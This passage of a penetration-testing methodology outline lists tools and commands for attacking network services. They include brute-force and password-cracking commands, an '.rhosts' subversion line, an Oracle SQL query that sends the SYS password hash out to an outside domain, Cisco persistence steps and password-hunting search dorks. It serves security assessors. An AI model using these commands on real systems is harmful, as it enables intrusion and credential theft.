16.15.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]

16.15.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

16.15.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]

16.15.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]

16.15.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

16.15.2. ldap brute force

16.15.2.1. bf_ldap

16.15.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)

16.15.2.2. K0ldS

16.15.2.3. LDAP_Brute.pl

16.15.3. Examine Configuration Files

16.15.3.1. General

16.15.3.1.1. containers.ldif

16.15.3.1.2. ldap.cfg

16.15.3.1.3. ldap.conf

16.15.3.1.4. ldap.xml

16.15.3.1.5. ldap-config.xml

16.15.3.1.6. ldap-realm.xml

16.15.3.1.7. slapd.conf

16.15.3.2. IBM SecureWay V3 server

16.15.3.2.1. V3.sas.oc

16.15.3.3. Microsoft Active Directory server

16.15.3.3.1. msadClassesAttrs.ldif

16.15.3.4. Netscape Directory Server 4

16.15.3.4.1. nsslapd.sas_at.conf

16.15.3.4.2. nsslapd.sas_oc.conf

16.15.3.5. OpenLDAP directory server

16.15.3.5.1. slapd.sas_at.conf

16.15.3.5.2. slapd.sas_oc.conf

16.15.3.6. Sun ONE Directory Server 5.1

16.15.3.6.1. 75sas.ldif

16.16. PPTP/L2TP/VPN port 500/1723 open

16.16.1. Enumeration

16.16.1.1. ike-scan

16.16.1.2. ike-probe

16.16.2. Brute-Force

16.16.2.1. ike-crack

16.16.3. Reference Material

16.16.3.1. PSK cracking paper

16.16.3.2. SecurityFocus Infocus

16.16.3.3. Scanning a VPN Implementation

16.17. Modbus port 502 open

16.17.1. modscan

16.18. rlogin port 513 open

16.18.1. Rlogin Enumeration

16.18.1.1. Find the files

16.18.1.1.1. find / -name .rhosts

16.18.1.1.2. locate .rhosts

16.18.1.2. Examine Files

16.18.1.2.1. cat .rhosts

16.18.1.3. Manual Login

16.18.1.3.1. rlogin hostname -l username

16.18.1.3.2. rlogin <IP>

16.18.1.4. Subvert the files

16.18.1.4.1. echo ++ > .rhosts

16.18.2. Rlogin Brute force

16.18.2.1. Hydra

16.19. rsh port 514 open

16.19.1. Rsh Enumeration

16.19.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

16.19.2. Rsh Brute Force

16.19.2.1. rsh-grind

16.19.2.2. Hydra

16.19.2.3. medusa

16.20. SQL Server Port 1433 1434 open

16.20.1. SQL Enumeration

16.20.1.1. piggy

16.20.1.2. SQLPing

16.20.1.2.1. sqlping ip_address/hostname

16.20.1.3. SQLPing2

16.20.1.4. SQLPing3

16.20.1.5. SQLpoke

16.20.1.6. SQL Recon

16.20.1.7. SQLver

16.20.2. SQL Brute Force

16.20.2.1. SQLPAT

16.20.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

16.20.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

16.20.2.2. SQL Dict

16.20.2.3. SQLAT

16.20.2.4. Hydra

16.20.2.5. SQLlhf

16.20.2.6. ForceSQL

16.21. Citrix port 1494 open

16.21.1. Citrix Enumeration

16.21.1.1. Default Domain

16.21.1.2. Published Applications

16.21.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

16.21.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

16.21.2. Citrix Brute Force

16.21.2.1. bforce.js

16.21.2.2. connect.js

16.21.2.3. Citrix Brute-forcer

16.21.2.4. Reference Material

16.21.2.4.1. Hacking Citrix - the legitimate backdoor

16.21.2.4.2. Hacking Citrix - the forceful way

16.22. Oracle Port 1521 Open

16.22.1. Oracle Enumeration

16.22.1.1. oracsec

16.22.1.2. Repscan

16.22.1.3. Sidguess

16.22.1.4. Scuba

16.22.1.5. DNS/HTTP Enumeration

16.22.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL

16.22.1.5.2. Untitled

16.22.1.6. WinSID

16.22.1.7. Oracle default password list

16.22.1.8. TNSVer

16.22.1.8.1. tnsver host [port]

16.22.1.9. TCP Scan

16.22.1.10. Oracle TNSLSNR

16.22.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

16.22.1.11. TNSCmd

16.22.1.11.1. perl tnscmd.pl -h ip_address

16.22.1.11.2. perl tnscmd.pl version -h ip_address

16.22.1.11.3. perl tnscmd.pl status -h ip_address

16.22.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

16.22.1.12. LSNrCheck

16.22.1.13. Oracle Security Check (needs credentials)

16.22.1.14. OAT

16.22.1.14.1. sh opwg.sh -s ip_address

16.22.1.14.2. opwg.bat -s ip_address

16.22.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

16.22.1.15. OScanner

16.22.1.15.1. sh oscanner.sh -s ip_address

16.22.1.15.2. oscanner.exe -s ip_address

16.22.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

16.22.1.15.4. reportviewer.exe oscanner_saved_file.xml

16.22.1.16. NGS Squirrel for Oracle

16.22.1.17. Service Register

16.22.1.17.1. Service-register.exe ip_address

16.22.1.18. PLSQL Scanner 2008

16.22.2. Oracle Brute Force

16.22.2.1. OAK

16.22.2.1.1. ora-getsid hostname port sid_dictionary_list

16.22.2.1.2. ora-auth-alter-session host port sid username password sql

16.22.2.1.3. ora-brutesid host port start

16.22.2.1.4. ora-pwdbrute host port sid username password-file

16.22.2.1.5. ora-userenum host port sid userlistfile

16.22.2.1.6. ora-ver -e (-f -l -a) host port

16.22.2.2. breakable (Targets Application Server Port)

16.22.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose

16.22.2.3. SQLInjector (Targets Application Server Port)

16.22.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

16.22.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

16.22.2.4. Check Password

16.22.2.5. orabf

16.22.2.5.1. orabf [hash]:[username] [options]

16.22.2.6. thc-orakel

16.22.2.6.1. Cracker

16.22.2.6.2. Client

16.22.2.6.3. Crypto

16.22.2.7. DBVisualisor

16.22.2.7.1. Sql scripts from pentest.co.uk

16.22.2.7.2. Manual sql input of previously reported vulnerabilties

16.22.3. Oracle Reference Material

16.22.3.1. Understanding SQL Injection

16.22.3.2. SQL Injection walkthrough

16.22.3.3. SQL Injection by example

16.22.3.4. Advanced SQL Injection in Oracle databases

16.22.3.5. Blind SQL Injection

16.22.3.6. SQL Cheatsheets

16.22.3.6.1. Untitled

16.23. NFS Port 2049 open

16.23.1. NFS Enumeration

16.23.1.1. showmount -e hostname/ip_address

16.23.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

16.23.2. NFS Brute Force

16.23.2.1. Interact with NFS share and try to add/delete

16.23.2.2. Exploit and Confuse Unix

16.23.3. Examine Configuration Files

16.23.3.1. /etc/exports

16.23.3.2. /etc/lib/nfs/xtab

16.23.4. nmap nse script

16.23.4.1. nfs-showmount

16.24. Compaq/HP Insight Manager Port 2301,2381open

16.24.1. HP Enumeration

16.24.1.1. Authentication Method

16.24.1.1.1. Host OS Authentication

16.24.1.1.2. Default Authentication

16.24.1.2. Wikto

16.24.1.3. Nstealth

16.24.2. HP Bruteforce

16.24.2.1. Hydra

16.24.2.2. Acunetix

16.24.3. Examine Configuration Files

16.24.3.1. path.properties

16.24.3.2. mx.log

16.24.3.3. CLIClientConfig.cfg

16.24.3.4. database.props

16.24.3.5. pg_hba.conf

16.24.3.6. jboss-service.xml

16.24.3.7. .namazurc

16.25. MySQL port 3306 open

16.25.1. Enumeration

16.25.1.1. nmap -A -n -p3306 <IP Address>

16.25.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

16.25.1.3. telnet IP_Address 3306

16.25.1.4. use test; select * from test;

16.25.1.5. To check for other DB's -- show databases

16.25.2. Administration

16.25.2.1. MySQL Network Scanner

16.25.2.2. MySQL GUI Tools

16.25.2.3. mysqlshow

16.25.2.4. mysqlbinlog

16.25.3. Manual Checks

16.25.3.1. Default usernames and passwords

16.25.3.1.1. username: root password:

16.25.3.1.2. testing

16.25.3.2. Configuration Files

16.25.3.2.1. Operating System

16.25.3.2.2. Command History

16.25.3.2.3. Log Files

16.25.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

16.25.3.2.5. MySQL data directory (Location specified in my.cnf)

16.25.3.2.6. SSL Check

16.25.3.3. Privilege Escalation

16.25.3.3.1. Current Level of access

16.25.3.3.2. Access passwords

16.25.3.3.3. Create a new user and grant him privileges

16.25.3.3.4. Break into a shell

16.25.4. SQL injection

16.25.4.1. mysql-miner.pl

16.25.4.1.1. mysql-miner.pl http://target/ expected_string database

16.25.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

16.25.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

16.25.5. References.

16.25.5.1. Design Weaknesses

16.25.5.1.1. MySQL running as root

16.25.5.1.2. Exposed publicly on Internet

16.25.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

16.25.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

16.26. RDesktop port 3389 open

16.26.1. Rdesktop Enumeration

16.26.1.1. Remote Desktop Connection

16.26.2. Rdestop Bruteforce

16.26.2.1. TSGrinder

16.26.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

16.26.2.2. Tscrack

16.27. Sybase Port 5000+ open

16.27.1. Sybase Enumeration

16.27.1.1. sybase-version ip_address from NGS

16.27.2. Sybase Vulnerability Assessment

16.27.2.1. Use DBVisualiser

16.27.2.1.1. Sybase Security checksheet

16.27.2.1.2. Manual sql input of previously reported vulnerabilties

16.27.2.2. NGS Squirrel for Sybase

16.28. SIP Port 5060 open

16.28.1. SIP Enumeration

16.28.1.1. netcat

16.28.1.1.1. nc IP_Address Port

16.28.1.2. sipflanker

16.28.1.2.1. python sipflanker.py 192.168.1-254

16.28.1.3. Sipscan

16.28.1.4. smap

16.28.1.4.1. smap IP_Address/Subnet_Mask

16.28.1.4.2. smap -o IP_Address/Subnet_Mask

16.28.1.4.3. smap -l IP_Address

16.28.2. SIP Packet Crafting etc.

16.28.2.1. sipsak

16.28.2.1.1. Tracing paths: - sipsak -T -s sip:[email protected]

16.28.2.1.2. Options request:- sipsak -vv -s sip:[email protected]

16.28.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

16.28.2.2. siprogue

16.28.3. SIP Vulnerability Scanning/ Brute Force

16.28.3.1. tftp bruteforcer

16.28.3.1.1. Default dictionary file

16.28.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

16.28.3.2. VoIPaudit

16.28.3.3. SiVuS

16.28.4. Examine Configuration Files

16.28.4.1. SIPDefault.cnf

16.28.4.2. asterisk.conf

16.28.4.3. sip.conf

16.28.4.4. phone.conf

16.28.4.5. sip_notify.conf

16.28.4.6. <Ethernet address>.cfg

16.28.4.7. 000000000000.cfg

16.28.4.8. phone1.cfg

16.28.4.9. sip.cfg etc. etc.

16.29. VNC port 5900^ open

16.29.1. VNC Enumeration

16.29.1.1. Scans

16.29.1.1.1. 5900^ for direct access.5800 for HTTP access.

16.29.2. VNC Brute Force

16.29.2.1. Password Attacks

16.29.2.1.1. Remote

16.29.2.1.2. Local

16.29.3. Exmine Configuration Files

16.29.3.1. .vnc

16.29.3.2. /etc/vnc/config

16.29.3.3. $HOME/.vnc/config

16.29.3.4. /etc/sysconfig/vncservers

16.29.3.5. /etc/vnc.conf

16.30. Tor Port 9001, 9030 open

16.30.1. Tor Node Checker

16.30.1.1. Ip Pages

16.30.1.2. Kewlio.net

16.30.2. nmap NSE script

16.31. Jet Direct 9100 open

16.31.1. hijetta

17. Password cracking

17.1. Rainbow crack

17.1.1. ophcrack

17.1.2. rainbow tables

17.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

17.2. Ophcrack

17.3. Cain & Abel

17.4. John the Ripper

17.4.1. ./unshadow passwd shadow > file_to_crack

17.4.2. ./john -single file_to_crack

17.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

17.4.4. ./john -show file_to_crack

17.4.5. ./john --incremental:All file_to_crack

17.5. fgdump

17.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

17.6. pwdump6

17.7. medusa

17.8. LCP

17.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

17.9.1. Domain credentials

17.9.2. Sniffing

17.9.3. pwdump import

17.9.4. sam import

17.10. aiocracker

17.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

18. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

18.1. Manual

18.1.1. Patch Levels

18.1.2. Confirmed Vulnerabilities

18.1.2.1. Severe

18.1.2.2. High

18.1.2.3. Medium

18.1.2.4. Low

18.2. Automated

18.2.1. Reports

18.2.2. Vulnerabilities

18.2.2.1. Severe

18.2.2.2. High

18.2.2.3. Medium

18.2.2.4. Low

18.3. Tools

18.3.1. GFI

18.3.2. Nessus (Linux)

18.3.2.1. Nessus (Windows)

18.3.3. NGS Typhon

18.3.4. NGS Squirrel for Oracle

18.3.5. NGS Squirrel for SQL

18.3.6. SARA

18.3.7. MatriXay

18.3.8. BiDiBlah

18.3.9. SSA

18.3.10. Oval Interpreter

18.3.11. Xscan

18.3.12. Security Manager +

18.3.13. Inguma

18.4. Resources

18.4.1. Security Focus

18.4.2. Microsoft Security Bulletin

18.4.3. Common Vulnerabilities and Exploits (CVE)

18.4.4. National Vulnerability Database (NVD)

18.4.5. The Open Source Vulnerability Database (OSVDB)

18.4.5.1. Standalone Database

18.4.5.1.1. Update URL

18.4.6. United States Computer Emergency Response Team (US-CERT)

18.4.7. Computer Emergency Response Team

18.4.8. Mozilla Security Information

18.4.9. SANS

18.4.10. Securiteam

18.4.11. PacketStorm Security

18.4.12. Security Tracker

18.4.13. Secunia

18.4.14. Vulnerabilities.org

18.4.15. ntbugtraq

18.4.16. Wireless Vulnerabilities and Exploits (WVE)

18.5. Blogs

18.5.1. Carnal0wnage

18.5.2. Fsecure Blog

18.5.3. g0ne blog

18.5.4. GNUCitizen

18.5.5. ha.ckers Blog

18.5.6. Jeremiah Grossman Blog

18.5.7. Metasploit

18.5.8. nCircle Blogs

18.5.9. pentest mokney.net

18.5.10. Rational Security

18.5.11. Rise Security

18.5.12. Security Fix Blog

18.5.13. Software Vulnerability Exploitation Blog

18.5.14. Taosecurity Blog

19. AS/400 Auditing

19.1. Remote

19.1.1. Information Gathering

19.1.1.1. Nmap using common iSeries (AS/400) services.

19.1.1.1.1. Unsecured services (Port;name;description)

19.1.1.1.2. Secured services (Port;name;description)

19.1.1.2. NetCat (old school technique)

19.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

19.1.1.3. Banners Grabbing

19.1.1.3.1. Telnet

19.1.1.3.2. FTP

19.1.1.3.3. HTTP Banner

19.1.1.3.4. POP3

19.1.1.3.5. SNMP

19.1.1.3.6. SMTP

19.1.2. Users Enumeration

19.1.2.1. Default AS/400 users accounts

19.1.2.2. Error messages

19.1.2.2.1. Telnet Login errors

19.1.2.2.2. POP3 authentication Errors

19.1.2.3. Qsys symbolic link (if ftp is enabled)

19.1.2.3.1. ftp target | quote stat | quote site namefmt 1

19.1.2.3.2. cd /

19.1.2.3.3. quote site listfmt 1

19.1.2.3.4. mkdir temp

19.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

19.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

19.1.2.3.7. dir /temp/qsys/*.usrprf

19.1.2.4. LDAP

19.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

19.1.2.4.2. Tool to browse LDAP

19.1.3. Exploitation

19.1.3.1. CVE References

19.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

19.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

19.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

19.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

19.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

19.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

19.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

19.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

19.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

19.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

19.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

19.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

19.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

19.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

19.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

19.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

19.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

19.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

19.1.3.2. Access with Work Station Gateway

19.1.3.2.1. http://target:5061/WSG

19.1.3.2.2. Default AS/400 accounts.

19.1.3.3. Network attacks (next release)

19.1.3.3.1. DB2

19.1.3.3.2. QSHELL

19.1.3.3.3. Hijacking Terminals

19.1.3.3.4. Trojan attacks

19.1.3.3.5. Hacking from AS/400

19.2. Local

19.2.1. System Value Security

19.2.1.1. Untitled

19.2.1.1.1. Untitled

19.2.1.2. Untitled

19.2.1.2.1. Untitled

19.2.1.3. Untitled

19.2.1.3.1. Untitled

19.2.1.4. Untitled

19.2.1.4.1. Recommended value is 30

19.2.2. Password Policy

19.2.2.1. Untitled

19.2.2.1.1. Untitled

19.2.2.2. Untitled

19.2.2.2.1. Untitled

19.2.2.3. Untitled

19.2.2.3.1. Untitled

19.2.2.4. Untitled

19.2.2.4.1. Untitled

19.2.2.5. Untitled

19.2.3. Audit level

19.2.3.1. Untitled

19.2.3.1.1. Recommended value is *SECURITY

19.2.4. Documentation

19.2.4.1. Users class

19.2.4.1.1. Untitled

19.2.4.2. System Audit Settings

19.2.4.2.1. Untitled

19.2.4.3. Special Authorities Definitions

19.2.4.3.1. Untitled

20. Bluetooth Specific Testing

20.1. Bluescanner

20.2. Bluesweep

20.3. btscanner

20.4. Redfang

20.5. Blueprint

20.6. Bluesnarfer

20.7. Bluebugger

20.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

20.8. Blueserial

20.9. Bloover

20.10. Bluesniff

20.11. Exploit Frameworks

20.11.1. BlueMaho

20.11.1.1. Untitled

20.12. Resources

20.12.1. URL's

20.12.1.1. BlueStumbler.org

20.12.1.2. Bluejackq.com

20.12.1.3. Bluejacking.com

20.12.1.4. Bluejackers

20.12.1.5. bluetooth-pentest

20.12.1.6. ibluejackedyou.com

20.12.1.7. Trifinite

20.12.2. Vulnerability Information

20.12.2.1. Common Vulnerabilities and Exploits (CVE)

20.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

20.12.3. White Papers

20.12.3.1. Bluesnarfing

21. Cisco Specific Testing

21.1. Methodology

21.1.1. Scan & Fingerprint.

21.1.1.1. Untitled

21.1.1.2. Untitled

21.1.1.3. If SNMP is active, then community string guessing should be performed.

21.1.2. Credentials Guessing.

21.1.2.1. Untitled

21.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

21.1.3. Connect

21.1.3.1. Untitled

21.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

21.1.4. Check for bugs

21.1.4.1. Untitled

21.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. 

21.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

21.1.5. Further your attack

21.1.5.1. Untitled

21.1.5.1.1. running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network.  

21.1.5.1.2. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network.  

21.1.5.2. Untitled

21.1.5.2.1. #> access-list 100 permit ip <IP> any

21.2. Scan & Fingerprint.

21.2.1. Port Scanning

21.2.1.1. nmap

21.2.1.1.1. Untitled

21.2.1.2. Other tools

21.2.1.2.1. Untitled

21.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

21.2.2. Fingerprinting

21.2.2.1. Untitled

21.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

21.2.2.2. Untitled

21.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

21.2.2.2.2. Untitled

21.3. Password Guessing.

21.3.1. Untitled

21.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

21.3.1.2. Untitled

21.3.2. Untitled

21.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

21.3.2.2. Untitled

21.3.3. Untitled

21.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

21.3.3.2. Untitled

21.4. SNMP Attacks.

21.4.1. Untitled

21.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

21.4.1.2. Untitled

21.4.2. Untitled

21.4.2.1. onesixytone  -c  SNMP.wordlist  <IP>

21.4.2.2. BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt  10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

21.4.3. Untitled

21.4.3.1. snmapwalk  -v  <Version>  -c  <Community string>  <IP>

21.4.3.2. Untitled

21.5. Connecting.

21.5.1. Telnet

21.5.1.1. Untitled

21.5.1.1.1.  telnet  <IP>

21.5.1.1.2. Sample Banners

21.5.2. SSH

21.5.3. Web Browser

21.5.3.1. Untitled

21.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

21.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:

21.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

21.5.4. TFTP

21.5.4.1. Untitled

21.5.4.1.1. Untitled

21.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

21.5.4.2. Untitled

21.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

21.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

21.5.4.2.3. Creating backdoors in Cisco IOS using TCL

21.6. Known Bugs.

21.6.1. Attack Tools

21.6.1.1. Untitled

21.6.1.1.1. Untitled

21.6.1.2. Untitled

21.6.1.2.1. Web browse to the Cisco device: http://<IP>

21.6.1.2.2. Untitled

21.6.1.2.3. Untitled

21.6.1.2.4. Untitled

21.6.1.3. Untitled

21.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

21.6.2. Common Vulnerabilities and Exploits (CVE) Information

21.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

21.7. Configuration Files.

21.7.1. Untitled

21.7.1.1. Configuration files explained

21.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.

21.7.1.1.2. Untitled

21.7.1.1.3. Untitled

21.7.1.1.4. Password Encryption Utilised

21.7.1.1.5. Untitled

21.7.1.2. Configuration Testing Tools

21.7.1.2.1. Nipper

21.7.1.2.2. fwauto (Beta)

21.8. References.

21.8.1. Cisco IOS Exploitation Techniques

22. Citrix Specific Testing

22.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

22.2. Enumeration

22.2.1. web search

22.2.1.1. Google (GHDB)

22.2.1.1.1. ext:ica

22.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

22.2.1.1.3. [WFClient] Password= filetype:ica

22.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

22.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

22.2.1.1.6. inurl:/Citrix/Nfuse17/

22.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

22.2.1.2. Google Hacks (Author Discovered)

22.2.1.2.1. filetype:ica Username=

22.2.1.2.2. inurl:/Citrix/AccessPlatform/

22.2.1.2.3. inurl:LogonAgent/Login.asp

22.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp

22.2.1.2.5. inurl:/Citrix/NFuse161/login.asp

22.2.1.2.6. inurl:/Citrix/NFuse16

22.2.1.2.7. inurl:/Citrix/NFuse151/

22.2.1.2.8. allintitle:MetaFrame XP Login

22.2.1.2.9. allintitle:MetaFrame Presentation Server Login

22.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

22.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login

22.2.1.3. Yahoo

22.2.1.3.1. originurlextension:ica

22.2.2. site search

22.2.2.1. Manual

22.2.2.1.1. review web page for useful information

22.2.2.1.2. review source for web page

22.2.3. generic

22.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

22.2.3.2. amap -bqv ip_address port_no.

22.2.4. citrix specific

22.2.4.1. enum.pl

22.2.4.1.1. perl enum.pl ip_address

22.2.4.2. enum.js

22.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address

22.2.4.3. connect.js

22.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application

22.2.4.4. Citrix-pa-scan

22.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

22.2.4.5. pabrute.c

22.2.4.5.1. ./pabrute pubapp list app_list ip_address

22.2.5. Default Ports

22.2.5.1. TCP

22.2.5.1.1. Citrix XML Service

22.2.5.1.2. Advanced Management Console

